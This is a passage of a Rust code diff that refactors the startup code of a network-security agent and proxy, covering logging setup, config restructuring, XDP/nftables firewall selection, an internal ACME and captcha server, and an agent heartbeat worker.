Err(anyhow::anyhow!("Daemonization failed: {}", e)); + let error_msg = format_daemonize_error(&e); + eprintln!( + "Failed to daemonize (working_directory='{}', pid_file='{}', user={:?}, group={:?}, chown_pid_file={}): {}", + config.daemon.working_directory, + config.daemon.pid_file, + config.daemon.user, + config.daemon.group, + config.daemon.chown_pid_file, + error_msg + ); + return Err(anyhow::anyhow!( + "Daemonization failed (working_directory='{}', pid_file='{}', user={:?}, group={:?}, chown_pid_file={}): {}", + config.daemon.working_directory, + config.daemon.pid_file, + config.daemon.user, + config.daemon.group, + config.daemon.chown_pid_file, + error_msg + )); } } } @@ -161,23 +174,21 @@ fn main() -> Result<()> { config.logging.level.to_lowercase() } else { match args.log_level { - crate::cli::LogLevel::Error => "error", - crate::cli::LogLevel::Warn => "warn", - crate::cli::LogLevel::Info => "info", - crate::cli::LogLevel::Debug => "debug", - crate::cli::LogLevel::Trace => "trace", - }.to_string() + crate::core::cli::LogLevel::Error => "error", + crate::core::cli::LogLevel::Warn => "warn", + crate::core::cli::LogLevel::Info => "info", + crate::core::cli::LogLevel::Debug => "debug", + crate::core::cli::LogLevel::Trace => "trace", + } + .to_string() }; unsafe { std::env::set_var("RUST_LOG", &log_level); } // Initialize logger using config level (CLI overrides if provided explicitly) - // Note: env_logger writes to stderr by default, which is standard practice + // Use log4rs for file-based logging if enabled, otherwise use env_logger { - use env_logger::Env; - let mut builder = env_logger::Builder::from_env(Env::default().default_filter_or("info")); - // Use log level from config, or CLI if explicitly set let level_filter = match log_level.as_str() { "error" => log::LevelFilter::Error, @@ -187,22 +198,89 @@ fn main() -> Result<()> { "trace" => log::LevelFilter::Trace, _ => args.log_level.to_level_filter(), }; - builder.filter_level(level_filter); - builder.format_timestamp_secs(); - // In daemon mode, write to stdout instead of stderr for better log separation - if config.daemon.enabled { - builder.target(env_logger::Target::Stdout); - } + // Initialize logging based on configuration + if config.logging.file_logging_enabled { + // Use log4rs for file-based logging with separate error logs + let syslog_config = if config.logging.syslog.enabled { + Some(&config.logging.syslog) + } else { + None + }; + + if let Err(e) = logger::init_file_logging( + level_filter, + &config.logging.log_directory, + config.logging.max_log_size, + config.logging.log_file_count, + config.daemon.enabled, + syslog_config, + ) { + eprintln!( + "Failed to initialize file logging: {}. Falling back to console logging.", + e + ); + // Fallback to console logging + if let Err(e) = logger::init_console_logging(level_filter, config.daemon.enabled) { + eprintln!("Failed to initialize console logging: {}", e); + std::process::exit(1); + } + } else { + println!( + "File logging initialized: logs directory = {}", + config.logging.log_directory + ); + println!(" - Error logs: {}/error.log", config.logging.log_directory); + println!( + " - Application logs: {}/app.log", + config.logging.log_directory + ); + println!( + " - Access logs: {}/access.log (proxy mode only)", + config.logging.log_directory + ); + if config.logging.syslog.enabled { + println!( + "Syslog logging enabled: facility={}, identifier={}", + config.logging.syslog.facility, config.logging.syslog.identifier + ); + } + } + } else { + // Use env_logger for console-only logging (backwards compatible) + use env_logger::Env; + let mut builder = + env_logger::Builder::from_env(Env::default().default_filter_or("info")); + builder.filter_level(level_filter); + builder.filter_module("access_log", log::LevelFilter::Info); + builder.format_timestamp_secs(); + + // In daemon mode, write to stdout instead of stderr for better log separation + if config.daemon.enabled { + builder.target(env_logger::Target::Stdout); + } - builder.try_init().ok(); + builder.try_init().ok(); + } + } + if !diagnostics.warnings.is_empty() { + for warning in diagnostics.warnings { + log::warn!("{warning}"); + } + } + if !diagnostics.errors.is_empty() { + for error_msg in diagnostics.errors { + log::error!("{error_msg}"); + } } // Start the tokio runtime and run the async application // Determine if multi-threaded runtime should be used: // - If multi_thread is explicitly set, use that value // - Otherwise, default to false for agent mode, true for proxy mode - let use_multi_thread = config.multi_thread.unwrap_or_else(|| config.mode != "agent"); + let use_multi_thread = config + .multi_thread + .unwrap_or_else(|| config.mode != "agent"); let runtime = if use_multi_thread { // Multi-threaded runtime @@ -223,11 +301,52 @@ fn main() -> Result<()> { runtime.block_on(async_main(args, config)) } +fn format_daemonize_error(err: &dyn std::error::Error) -> String { + let msg = err.to_string(); + if let Some(code) = extract_errno_code(&msg) { + let mut description = io::Error::from_raw_os_error(code).to_string(); + description = strip_os_error_code(&description); + // Replace errno code with a description if possible + if !description.is_empty() { + return msg.replace(&format!("errno {}", code), &description); + } + } + strip_os_error_code(&msg) +} + +fn extract_errno_code(msg: &str) -> Option { + let marker = "errno "; + let start = msg.find(marker)? + marker.len(); + let digits: String = msg[start..] + .chars() + .take_while(|c| c.is_ascii_digit()) + .collect(); + digits.parse::().ok() +} + +fn strip_os_error_code(msg: &str) -> String { + if let Some(start) = msg.find(" (os error ") { + let mut end = start + " (os error ".len(); + while end < msg.len() && msg.as_bytes()[end].is_ascii_digit() { + end += 1; + } + if end < msg.len() && msg.as_bytes()[end] == b')' { + let mut out = String::with_capacity(msg.len()); + out.push_str(&msg[..start]); + out.push_str(&msg[end + 1..]); + return out; + } + } + msg.to_string() +} + #[allow(clippy::too_many_lines)] async fn async_main(args: Args, config: Config) -> Result<()> { - if config.daemon.enabled { - log::info!("Running in daemon mode (PID file: {})", config.daemon.pid_file); + log::info!( + "Running in daemon mode (PID file: {})", + config.daemon.pid_file + ); } // Initialize global HTTP client with keepalive configuration @@ -241,14 +360,14 @@ async fn async_main(args: Args, config: Config) -> Result<()> { let mut threat_client_enabled = false; let mut captcha_client_enabled = false; - let iface_names: Vec = if !config.network.ifaces.is_empty() { config.network.ifaces.clone() } else { vec![config.network.iface.clone()] }; - use crate::firewall::{FirewallBackend, FirewallMode, NftablesFirewall, IptablesFirewall}; + use crate::bpf; + use crate::firewall::{FirewallBackend, FirewallMode, IptablesFirewall, NftablesFirewall}; use std::sync::Mutex; #[allow(unused_mut)] @@ -258,13 +377,13 @@ async fn async_main(args: Args, config: Config) -> Result<()> { let mut firewall_backend = FirewallBackend::None; let mut nftables_firewall: Option>> = None; let mut iptables_firewall: Option>> = None; - let firewall_mode = config.network.firewall_mode; + let firewall_mode = config.firewall.mode; // Track XDP modes per interface for startup summary #[allow(unused_mut)] let mut xdp_modes: Vec<(&str, &str)> = Vec::new(); - if config.network.disable_xdp { + if config.firewall.disable_xdp { log::warn!("XDP disabled by config, will use nftables fallback"); } else { #[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] @@ -273,8 +392,10 @@ async fn async_main(args: Args, config: Config) -> Result<()> { libbpf_rs::set_print(None); for iface in &iface_names { - let boxed_open: Box> = Box::new(MaybeUninit::uninit()); - let open_object: &'static mut MaybeUninit = Box::leak(boxed_open); + let boxed_open: Box> = + Box::new(MaybeUninit::uninit()); + let open_object: &'static mut MaybeUninit = + Box::leak(boxed_open); let skel_builder = bpf::FilterSkelBuilder::default(); match skel_builder.open(open_object).and_then(|o| o.load()) { Ok(mut skel) => { @@ -285,7 +406,12 @@ async fn async_main(args: Args, config: Config) -> Result<()> { continue; } }; - match bpf_attach_to_xdp(&mut skel, ifindex, Some(iface.as_str()), &config.network.ip_version) { + match bpf_attach_to_xdp( + &mut skel, + ifindex, + Some(iface.as_str()), + &config.network.ip_version, + ) { Ok(mode) => { xdp_modes.push((iface.as_str(), mode.as_str())); skels.push(Arc::new(skel)); @@ -294,8 +420,14 @@ async fn async_main(args: Args, config: Config) -> Result<()> { Err(e) => { // Check if error is EAFNOSUPPORT (error 97) - IPv6 might be disabled let error_str = e.to_string(); - if error_str.contains("97") || error_str.contains("Address family not supported") { - log::warn!("Failed to attach XDP to '{}': {} (IPv6 disabled)", iface, e); + if error_str.contains("97") + || error_str.contains("Address family not supported") + { + log::warn!( + "Failed to attach XDP to '{}': {} (IPv6 disabled)", + iface, + e + ); } else { log::error!("Failed to attach XDP to '{}': {}", iface, e); } @@ -305,10 +437,11 @@ async fn async_main(args: Args, config: Config) -> Result<()> { Err(e) => { // Check for common BPF/kernel support errors let error_str = e.to_string(); - if error_str.contains("Function not implemented") || - error_str.contains("ENOSYS") || - error_str.contains("error 38") || - error_str.contains("CONFIG_BPF_SYSCALL") { + if error_str.contains("Function not implemented") + || error_str.contains("ENOSYS") + || error_str.contains("error 38") + || error_str.contains("CONFIG_BPF_SYSCALL") + { log::warn!("BPF not supported by kernel for '{}': {}", iface, e); } else { log::warn!("failed to load BPF skeleton for '{}': {e}", iface); @@ -333,7 +466,7 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Forced XDP mode if !skels.is_empty() { firewall_backend = FirewallBackend::Xdp; - let _ = access_rules::init_access_rules_from_global(&skels); + let _ = crate::security::access_rules::init_access_rules_from_global(&skels); log::info!("Using XDP/BPF firewall backend (forced)"); } else { log::error!("XDP mode forced but BPF not available"); @@ -378,12 +511,12 @@ async fn async_main(args: Args, config: Config) -> Result<()> { } FirewallMode::Auto => { // Auto mode: try XDP > nftables > iptables > none - if !config.network.disable_xdp && !skels.is_empty() { + if !config.firewall.disable_xdp && !skels.is_empty() { firewall_backend = FirewallBackend::Xdp; - let _ = access_rules::init_access_rules_from_global(&skels); + let _ = crate::security::access_rules::init_access_rules_from_global(&skels); log::info!("Using XDP/BPF firewall backend"); } else { - if config.network.disable_xdp { + if config.firewall.disable_xdp { log::info!("XDP disabled - trying fallback backends"); } else { log::warn!("XDP/BPF not available - trying fallback backends"); @@ -424,34 +557,39 @@ async fn async_main(args: Args, config: Config) -> Result<()> { } if firewall_backend == FirewallBackend::None { - log::warn!("No firewall backend available - access rules will be enforced in userland only"); + log::warn!( + "No firewall backend available - access rules will be enforced in userland only" + ); } } } } // Create BPF statistics collector - let bpf_stats_collector = BpfStatsCollector::new(skels.clone(), config.bpf_stats.enabled); + let bpf_stats_collector = + BpfStatsCollector::new(skels.clone(), config.logging.bpf_stats.enabled); // Create TCP fingerprinting collector let tcp_fingerprint_collector = TcpFingerprintCollector::new_with_config( skels.clone(), - TcpFingerprintConfig::from_cli_config(&config.tcp_fingerprint) + TcpFingerprintConfig::from_cli_config(&config.logging.tcp_fingerprint), ); // Set global TCP fingerprint collector for proxy access - crate::utils::tcp_fingerprint::set_global_tcp_fingerprint_collector(tcp_fingerprint_collector.clone()); + crate::utils::fingerprint::tcp_fingerprint::set_global_tcp_fingerprint_collector( + tcp_fingerprint_collector.clone(), + ); // Initialize access rules for nftables or iptables backend if active if firewall_backend == FirewallBackend::Nftables { if let Some(ref nft_fw) = nftables_firewall { - if let Err(e) = access_rules::init_access_rules_nftables(nft_fw) { + if let Err(e) = crate::security::access_rules::init_access_rules_nftables(nft_fw) { log::error!("Failed to initialize nftables access rules: {}", e); } } } else if firewall_backend == FirewallBackend::Iptables { if let Some(ref ipt_fw) = iptables_firewall { - if let Err(e) = access_rules::init_access_rules_iptables(ipt_fw) { + if let Err(e) = crate::security::access_rules::init_access_rules_iptables(ipt_fw) { log::error!("Failed to initialize iptables access rules: {}", e); } } @@ -467,107 +605,131 @@ async fn async_main(args: Args, config: Config) -> Result<()> { iptables_firewall: iptables_firewall.clone(), }; - // Start the captcha verification server in a separate task (skip in agent mode to save memory) - let captcha_server_enabled = config.mode != "agent"; - if captcha_server_enabled { - tokio::spawn(async move { - if let Err(e) = captcha_server::start_captcha_server().await { - error!("Captcha server error: {}", e); - } - }); - } - - // Start embedded ACME server if enabled (skip in agent mode - no TLS termination needed) - if config.acme.enabled && config.mode != "agent" { - let acme_config = config.acme.clone(); - let pingora_config = config.pingora.clone(); - let redis_config = config.redis.clone(); + // Start unified internal services server (captcha + ACME) if enabled (skip in agent mode) + if config.proxy.internal_services.enabled && config.mode != "agent" { + let internal_services_config = config.proxy.internal_services.clone(); + let acme_config = config.proxy.acme.clone(); + let pingora_config = config.proxy.clone(); tokio::spawn(async move { - use crate::acme::embedded::{EmbeddedAcmeServer, EmbeddedAcmeConfig}; + use crate::proxy::acme::embedded::{EmbeddedAcmeConfig, EmbeddedAcmeServer}; + use crate::server::internal_server::{InternalServerConfig, start_internal_server}; use std::path::PathBuf; - // Use upstreams path from pingora configuration - let upstreams_path = PathBuf::from(&pingora_config.upstreams_conf); + // Prepare ACME configuration if ACME is enabled + let (acme_config_arc, domain_reader_arc) = if acme_config.enabled { + // Use upstreams path from pingora configuration + let upstreams_path = PathBuf::from(&pingora_config.upstream.conf); - // Determine email - let email = acme_config.email - .unwrap_or_else(|| "admin@example.com".to_string()); + // Determine email + let email = acme_config + .email + .unwrap_or_else(|| "admin@example.com".to_string()); - // Determine Redis URL - let redis_url = acme_config.redis_url - .or_else(|| if redis_config.url.is_empty() { None } else { Some(redis_config.url) }); + // Determine Redis URL + let redis_url = acme_config.redis_url.or_else(|| { + if pingora_config.redis.url.is_empty() { + None + } else { + Some(pingora_config.redis.url.clone()) + } + }); + + // Create Redis SSL config if available + let redis_ssl = pingora_config.redis.ssl.map(|ssl| { + crate::proxy::acme::config::RedisSslConfig { + ca_cert_path: ssl.ca_cert_path, + client_cert_path: ssl.client_cert_path, + client_key_path: ssl.client_key_path, + insecure: ssl.insecure, + } + }); - // Create Redis SSL config if available - let redis_ssl = redis_config.ssl.map(|ssl| crate::acme::config::RedisSslConfig { - ca_cert_path: ssl.ca_cert_path, - client_cert_path: ssl.client_cert_path, - client_key_path: ssl.client_key_path, - insecure: ssl.insecure, - }); + // Log storage configuration for debugging + if let Some(ref st) = acme_config.storage_type { + info!("ACME storage_type from config: '{}'", st); + } else { + warn!("ACME storage_type not set in config, will auto-detect from redis_url"); + } + if let Some(ref ru) = redis_url { + info!("ACME redis_url: '{}'", ru); + } else { + warn!("ACME redis_url not set"); + } - // Log storage configuration for debugging - if let Some(ref st) = acme_config.storage_type { - info!("ACME storage_type from config: '{}'", st); - } else { - warn!("ACME storage_type not set in config, will auto-detect from redis_url"); - } - if let Some(ref ru) = redis_url { - info!("ACME redis_url: '{}'", ru); - } else { - warn!("ACME redis_url not set"); - } + let embedded_acme_config = EmbeddedAcmeConfig { + port: acme_config.port, + bind_ip: "127.0.0.1".to_string(), + upstreams_path, + email, + storage_path: PathBuf::from(&acme_config.storage_path), + storage_type: acme_config.storage_type.clone(), + development: acme_config.development, + redis_url, + redis_ssl, + }; + + let acme_server = EmbeddedAcmeServer::new(embedded_acme_config.clone()); + + // Initialize domain reader + if let Err(e) = acme_server.init_domain_reader().await { + error!("Failed to initialize ACME domain reader: {}", e); + return; + } - let embedded_acme_config = EmbeddedAcmeConfig { - port: acme_config.port, - bind_ip: "127.0.0.1".to_string(), - upstreams_path, - email, - storage_path: PathBuf::from(&acme_config.storage_path), - storage_type: acme_config.storage_type.clone(), - development: acme_config.development, - redis_url, - redis_ssl, - }; + let domain_reader = acme_server.get_domain_reader(); - // Clone config for HTTP server before moving it - let http_server_config = embedded_acme_config.clone(); + // Clone acme_server to process certificates in background + let acme_server_for_processing = acme_server; - let acme_server = EmbeddedAcmeServer::new(embedded_acme_config); + // Start certificate processing in background + tokio::spawn(async move { + // Give the server a moment to start before processing certificates + tokio::time::sleep(tokio::time::Duration::from_millis(500)).await; - // Initialize domain reader - if let Err(e) = acme_server.init_domain_reader().await { - error!("Failed to initialize ACME domain reader: {}", e); - return; - } + // Process certificates initially (endpoint check will retry if server not ready) + if let Err(e) = acme_server_for_processing.process_certificates().await { + warn!("Failed to process initial certificates: {}", e); + } + }); - // Start the HTTP server first (in background) so endpoint checks can succeed - tokio::spawn(async move { - let http_server = EmbeddedAcmeServer::new(http_server_config); - // Initialize domain reader for the HTTP server - if let Err(e) = http_server.init_domain_reader().await { - error!("Failed to initialize domain reader for HTTP server: {}", e); - return; - } - if let Err(e) = http_server.start_server().await { - error!("ACME server error: {}", e); - } - }); + (Some(Arc::new(embedded_acme_config)), Some(domain_reader)) + } else { + (None, None) + }; - // Give the server a moment to start before processing certificates - tokio::time::sleep(tokio::time::Duration::from_millis(500)).await; + // Determine ACME challenge directory + let acme_challenge_dir = if acme_config.enabled { + Some(PathBuf::from(&acme_config.storage_path).join("challenges")) + } else { + None + }; - // Process certificates initially (endpoint check will retry if server not ready) - if let Err(e) = acme_server.process_certificates().await { - warn!("Failed to process initial certificates: {}", e); + // Start unified internal services server + let server_config = InternalServerConfig { + port: internal_services_config.port, + bind_ip: internal_services_config.bind_ip, + acme_challenge_dir, + acme_config: acme_config_arc, + acme_domain_reader: domain_reader_arc, + }; + + if let Err(e) = start_internal_server(server_config).await { + error!("Internal services server error: {}", e); } }); } let (shutdown_tx, shutdown_rx) = watch::channel(false); // Initialize Redis manager if Redis URL is provided (skip in agent mode) - let redis_initialized = if config.mode != "agent" && !config.redis.url.is_empty() { - match redis::RedisManager::init(&config.redis.url, config.redis.prefix.clone(), config.redis.ssl.as_ref()).await { + let redis_initialized = if config.mode != "agent" && !config.proxy.redis.url.is_empty() { + match crate::storage::redis::RedisManager::init( + &config.proxy.redis.url, + config.proxy.redis.prefix.clone(), + config.proxy.redis.ssl.as_ref(), + ) + .await + { Ok(_) => true, Err(e) => { log::error!("Failed to initialize Redis manager: {}", e); @@ -583,7 +745,7 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Set ACME config for certificate worker to use (skip in agent mode) if config.mode != "agent" { - worker::certificate::set_acme_config(config.acme.clone()); + worker::certificate::set_acme_config(config.proxy.acme.clone()); } // Register certificate worker only if Redis was successfully initialized (skip in agent mode) @@ -594,9 +756,17 @@ async fn async_main(args: Args, config: Config) -> Result<()> { .ok() .and_then(|content| serde_yaml::from_str::(&content).ok()) .and_then(|yaml| { - // Try pingora.proxy_certificates first, then fallback to root level + // Try pingora.certificates first, then fallback to root level and old names for backward compatibility yaml.get("pingora") - .and_then(|pingora| pingora.get("proxy_certificates")) + .and_then(|pingora| pingora.get("certificates")) + .or_else(|| { + yaml.get("proxy") + .and_then(|proxy| proxy.get("certificates")) + }) + .or_else(|| { + yaml.get("pingora") + .and_then(|pingora| pingora.get("proxy_certificates")) + }) .or_else(|| yaml.get("proxy_certificates")) .and_then(|v| v.as_str().map(|s| s.to_string())) }) @@ -606,7 +776,7 @@ async fn async_main(args: Args, config: Config) -> Result<()> { }; // Set proxy_certificates path for ACME certificate saving - crate::acme::set_proxy_certificates_path(Some(certificate_path.clone())); + crate::proxy::acme::set_proxy_certificates_path(Some(certificate_path.clone())); let refresh_interval = 30; // 30 seconds default refresh interval let worker_config = worker::WorkerConfig { @@ -615,11 +785,11 @@ async fn async_main(args: Args, config: Config) -> Result<()> { enabled: true, }; - let upstreams_path = config.pingora.upstreams_conf.clone(); + let upstreams_path = config.proxy.upstream.conf.clone(); let certificate_worker = worker::certificate::CertificateWorker::new( certificate_path.clone(), upstreams_path, - refresh_interval + refresh_interval, ); if let Err(e) = worker_manager.register_worker(worker_config, certificate_worker) { @@ -629,25 +799,20 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Validate API key if provided if !config.platform.base_url.is_empty() && !config.platform.api_key.is_empty() { - if let Err(e) = validate_api_key( - &config.platform.base_url, - &config.platform.api_key, - ).await { + if let Err(e) = validate_api_key(&config.platform.base_url, &config.platform.api_key).await + { log::error!("API key validation failed: {}", e); return Err(anyhow::anyhow!("API key validation failed: {}", e)); } } // Initialize content scanning from CLI config (skip in agent mode) - let content_scanner_enabled = config.mode != "agent" && config.content_scanning.enabled; + let content_scanner_enabled = config.mode != "agent" && config.proxy.content_scanning.enabled; if content_scanner_enabled { let content_scanning_config = ContentScanningConfig { - enabled: config.content_scanning.enabled, - clamav_server: config.content_scanning.clamav_server.clone(), - max_file_size: config.content_scanning.max_file_size, - scan_content_types: config.content_scanning.scan_content_types.clone(), - skip_extensions: config.content_scanning.skip_extensions.clone(), - scan_expression: config.content_scanning.scan_expression.clone(), + enabled: config.proxy.content_scanning.enabled, + clamav_server: config.proxy.content_scanning.clamav_server.clone(), + max_file_size: config.proxy.content_scanning.max_file_size, }; if let Err(e) = init_content_scanner(content_scanning_config) { log::warn!("Failed to initialize content scanner: {}", e); @@ -659,18 +824,19 @@ async fn async_main(args: Args, config: Config) -> Result<()> { enabled: config.platform.log_sending_enabled, base_url: config.platform.base_url.clone(), api_key: config.platform.api_key.clone(), - batch_size_limit: 5000, // Default: 5000 logs per batch + batch_size_limit: 5000, // Default: 5000 logs per batch batch_size_bytes: 5 * 1024 * 1024, // Default: 5MB - batch_timeout_secs: 10, // Default: 10 seconds - include_request_body: false, // Default: disabled + batch_timeout_secs: 10, // Default: 10 seconds + include_request_body: false, // Default: disabled max_body_size: config.platform.max_body_size, + channel_capacity: Some(crate::worker::log::DEFAULT_CHANNEL_CAPACITY), // Bounded channel to prevent OOM under heavy load }; set_log_sender_config(log_sender_config); // Register log sender worker if log sending is enabled - let log_sender_enabled = config.platform.log_sending_enabled && !config.platform.api_key.is_empty(); + let log_sender_enabled = + config.platform.log_sending_enabled && !config.platform.api_key.is_empty(); if log_sender_enabled { - let check_interval = 1; // Check every 1 second let worker_config = worker::WorkerConfig { name: "log_sender".to_string(), @@ -683,12 +849,117 @@ async fn async_main(args: Args, config: Config) -> Result<()> { if let Err(e) = worker_manager.register_worker(worker_config, log_sender_worker) { log::error!("Failed to register log sender worker: {}", e); } + + // Register agent status worker (register + heartbeat) while the unified event queue exists. + // Minimal-conflict workspace_id strategy: read from env only; if missing, derive from agent_name only. + if std::env::var("AGENT_ID").ok().is_some() { + log::warn!("AGENT_ID is ignored; agent_id is derived from agent_name + workspace_id."); + } + + let hostname = std::env::var("HOSTNAME") + .ok() + .filter(|s| !s.trim().is_empty()) + .unwrap_or_else(|| gethostname::gethostname().to_string_lossy().into_owned()); + + let agent_name = std::env::var("AGENT_NAME") + .ok() + .filter(|s| !s.trim().is_empty()) + .unwrap_or_else(|| hostname.clone()); + + let workspace_id = read_workspace_id_from_env(); + if workspace_id.is_none() { + log::warn!( + "WORKSPACE_ID not set; agent_id derived only from agent_name '{}'. Set WORKSPACE_ID (or ARXIGNIS_WORKSPACE_ID) to avoid collisions across organizations.", + agent_name + ); + } + + let agent_id = derive_agent_id(&agent_name, workspace_id.as_deref()); + + let tags = std::env::var("AGENT_TAGS") + .ok() + .map(|value| { + value + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect::>() + }) + .unwrap_or_default(); + + let ip_addresses = std::env::var("AGENT_IP_ADDRESSES") + .or_else(|_| std::env::var("AGENT_IPS")) + .ok() + .map(|value| { + value + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect::>() + }) + .unwrap_or_default(); + + let mut capabilities: Vec = Vec::new(); + capabilities.push("log_sender".to_string()); + if config.logging.bpf_stats.enabled && !state.skels.is_empty() { + capabilities.push("bpf_stats".to_string()); + if config.logging.bpf_stats.enable_dropped_ip_events { + capabilities.push("bpf_stats_dropped_ip_events".to_string()); + } + } + if config.logging.tcp_fingerprint.enabled && !state.skels.is_empty() { + capabilities.push("tcp_fingerprint".to_string()); + if config.logging.tcp_fingerprint.enable_fingerprint_events { + capabilities.push("tcp_fingerprint_events".to_string()); + } + } + if !state.skels.is_empty() { + capabilities.push("xdp".to_string()); + } + + let mut metadata = HashMap::new(); + metadata.insert("os".to_string(), std::env::consts::OS.to_string()); + metadata.insert("arch".to_string(), std::env::consts::ARCH.to_string()); + metadata.insert("version".to_string(), env!("CARGO_PKG_VERSION").to_string()); + metadata.insert("mode".to_string(), config.mode.clone()); + metadata.insert("platform_base_url".to_string(), config.platform.base_url.clone()); + add_platform_metadata(&mut metadata); + + let started_at = chrono::Utc::now(); + let identity = AgentStatusIdentity { + agent_id, + agent_name, + hostname, + version: env!("CARGO_PKG_VERSION").to_string(), + mode: config.mode.clone(), + tags, + capabilities, + interfaces: iface_names.clone(), + ip_addresses, + metadata, + started_at, + }; + + let heartbeat_secs = std::env::var("AGENT_HEARTBEAT_SECS") + .ok() + .and_then(|value| value.parse::().ok()) + .unwrap_or(30); + + let worker_config = worker::WorkerConfig { + name: "agent_status".to_string(), + interval_secs: heartbeat_secs, + enabled: true, + }; + + let worker = AgentStatusWorker::new(identity, heartbeat_secs); + if let Err(e) = worker_manager.register_worker(worker_config, worker) { + log::error!("Failed to register agent status worker: {}", e); + } } // Determine if we have API key for full functionality let has_api_key = !config.platform.api_key.is_empty(); - // Build list of interfaces to attach if has_api_key && !config.platform.base_url.is_empty() { // Skip WAF wirefilter initialization in agent mode (only access rules needed for XDP) @@ -709,20 +980,21 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Initialize threat intelligence client (skip in agent mode to save memory) if !is_agent_mode { threat_client_enabled = true; - let has_threat = !config.platform.threat.url.is_empty() || config.platform.threat.path.is_some(); - let has_geoip = !config.geoip.country.url.is_empty() - || !config.geoip.asn.url.is_empty() - || !config.geoip.city.url.is_empty() - || config.geoip.country.path.is_some() - || config.geoip.asn.path.is_some() - || config.geoip.city.path.is_some(); + let has_threat = + !config.platform.threat.url.is_empty() || config.platform.threat.path.is_some(); + let has_geoip = !config.proxy.geoip.country.url.is_empty() + || !config.proxy.geoip.asn.url.is_empty() + || !config.proxy.geoip.city.url.is_empty() + || config.proxy.geoip.country.path.is_some() + || config.proxy.geoip.asn.path.is_some() + || config.proxy.geoip.city.path.is_some(); if has_threat || has_geoip { - if let Err(e) = threat::init_threat_client( + if let Err(e) = crate::security::waf::threat::init_threat_client( config.platform.threat.path.clone(), - config.geoip.country.path.clone(), - config.geoip.asn.path.clone(), - config.geoip.city.path.clone(), + config.proxy.geoip.country.path.clone(), + config.proxy.geoip.asn.path.clone(), + config.proxy.geoip.city.path.clone(), ) .await { @@ -749,10 +1021,10 @@ async fn async_main(args: Args, config: Config) -> Result<()> { } // Register GeoIP MMDB refresh workers if configured - let refresh_interval = config.geoip.refresh_secs; + let refresh_interval = config.proxy.geoip.refresh_secs; // Country database worker - if !config.geoip.country.url.is_empty() && refresh_interval > 0 { + if !config.proxy.geoip.country.url.is_empty() && refresh_interval > 0 { let worker_config = worker::WorkerConfig { name: "geoip_country_mmdb".to_string(), interval_secs: refresh_interval, @@ -760,10 +1032,10 @@ async fn async_main(args: Args, config: Config) -> Result<()> { }; let worker = worker::geoip_mmdb::GeoipMmdbWorker::new( refresh_interval, - config.geoip.country.url.clone(), + config.proxy.geoip.country.url.clone(), "".to_string(), // versions_url not used for geoip - config.geoip.country.path.clone(), - config.geoip.country.headers.clone(), + config.proxy.geoip.country.path.clone(), + config.proxy.geoip.country.headers.clone(), worker::geoip_mmdb::GeoipDatabaseType::Country, ); if let Err(e) = worker_manager.register_worker(worker_config, worker) { @@ -772,7 +1044,7 @@ async fn async_main(args: Args, config: Config) -> Result<()> { } // ASN database worker - if !config.geoip.asn.url.is_empty() && refresh_interval > 0 { + if !config.proxy.geoip.asn.url.is_empty() && refresh_interval > 0 { let worker_config = worker::WorkerConfig { name: "geoip_asn_mmdb".to_string(), interval_secs: refresh_interval, @@ -780,61 +1052,61 @@ async fn async_main(args: Args, config: Config) -> Result<()> { }; let worker = worker::geoip_mmdb::GeoipMmdbWorker::new( refresh_interval, - config.geoip.asn.url.clone(), + config.proxy.geoip.asn.url.clone(), "".to_string(), - config.geoip.asn.path.clone(), - config.geoip.asn.headers.clone(), + config.proxy.geoip.asn.path.clone(), + config.proxy.geoip.asn.headers.clone(), worker::geoip_mmdb::GeoipDatabaseType::Asn, ); if let Err(e) = worker_manager.register_worker(worker_config, worker) { log::error!("Failed to register GeoIP ASN MMDB worker: {}", e); } - } - // City database worker - if !config.geoip.city.url.is_empty() && refresh_interval > 0 { - let worker_config = worker::WorkerConfig { - name: "geoip_city_mmdb".to_string(), - interval_secs: refresh_interval, - enabled: true, - }; - let worker = worker::geoip_mmdb::GeoipMmdbWorker::new( - refresh_interval, - config.geoip.city.url.clone(), - "".to_string(), - config.geoip.city.path.clone(), - config.geoip.city.headers.clone(), - worker::geoip_mmdb::GeoipDatabaseType::City, - ); - if let Err(e) = worker_manager.register_worker(worker_config, worker) { - log::error!("Failed to register GeoIP City MMDB worker: {}", e); + // City database worker + if !config.proxy.geoip.city.url.is_empty() && refresh_interval > 0 { + let worker_config = worker::WorkerConfig { + name: "geoip_city_mmdb".to_string(), + interval_secs: refresh_interval, + enabled: true, + }; + let worker = worker::geoip_mmdb::GeoipMmdbWorker::new( + refresh_interval, + config.proxy.geoip.city.url.clone(), + "".to_string(), + config.proxy.geoip.city.path.clone(), + config.proxy.geoip.city.headers.clone(), + worker::geoip_mmdb::GeoipDatabaseType::City, + ); + if let Err(e) = worker_manager.register_worker(worker_config, worker) { + log::error!("Failed to register GeoIP City MMDB worker: {}", e); + } } } } - } - } - // Initialize captcha client if configuration is provided (skip in agent mode) - if let (Some(site_key), Some(secret_key), Some(jwt_secret)) = ( - &config.platform.captcha.site_key, - &config.platform.captcha.secret_key, - &config.platform.captcha.jwt_secret, - ) { - let captcha_config = CaptchaConfig { - site_key: site_key.clone(), - secret_key: secret_key.clone(), - jwt_secret: jwt_secret.clone(), - provider: CaptchaProvider::from_str(&config.platform.captcha.provider) - .unwrap_or(CaptchaProvider::HCaptcha), - token_ttl_seconds: config.platform.captcha.token_ttl, - validation_cache_ttl_seconds: config.platform.captcha.cache_ttl, - }; - - if let Err(e) = init_captcha_client(captcha_config).await { - log::warn!("Failed to initialize captcha client: {}", e); - } else { - captcha_client_enabled = true; - start_cache_cleanup_task().await; + // Initialize captcha client if configuration is provided (skip in agent mode) + if let (Some(site_key), Some(secret_key), Some(jwt_secret)) = ( + &config.proxy.captcha.site_key, + &config.proxy.captcha.secret_key, + &config.proxy.captcha.jwt_secret, + ) { + let captcha_config = CaptchaConfig { + site_key: site_key.clone(), + secret_key: secret_key.clone(), + jwt_secret: jwt_secret.clone(), + provider: CaptchaProvider::from_str(&config.proxy.captcha.provider) + .unwrap_or(CaptchaProvider::HCaptcha), + token_ttl_seconds: config.proxy.captcha.token_ttl, + validation_cache_ttl_seconds: config.proxy.captcha.cache_ttl, + }; + + if let Err(e) = init_captcha_client(captcha_config).await { + log::warn!("Failed to initialize captcha client: {}", e); + } 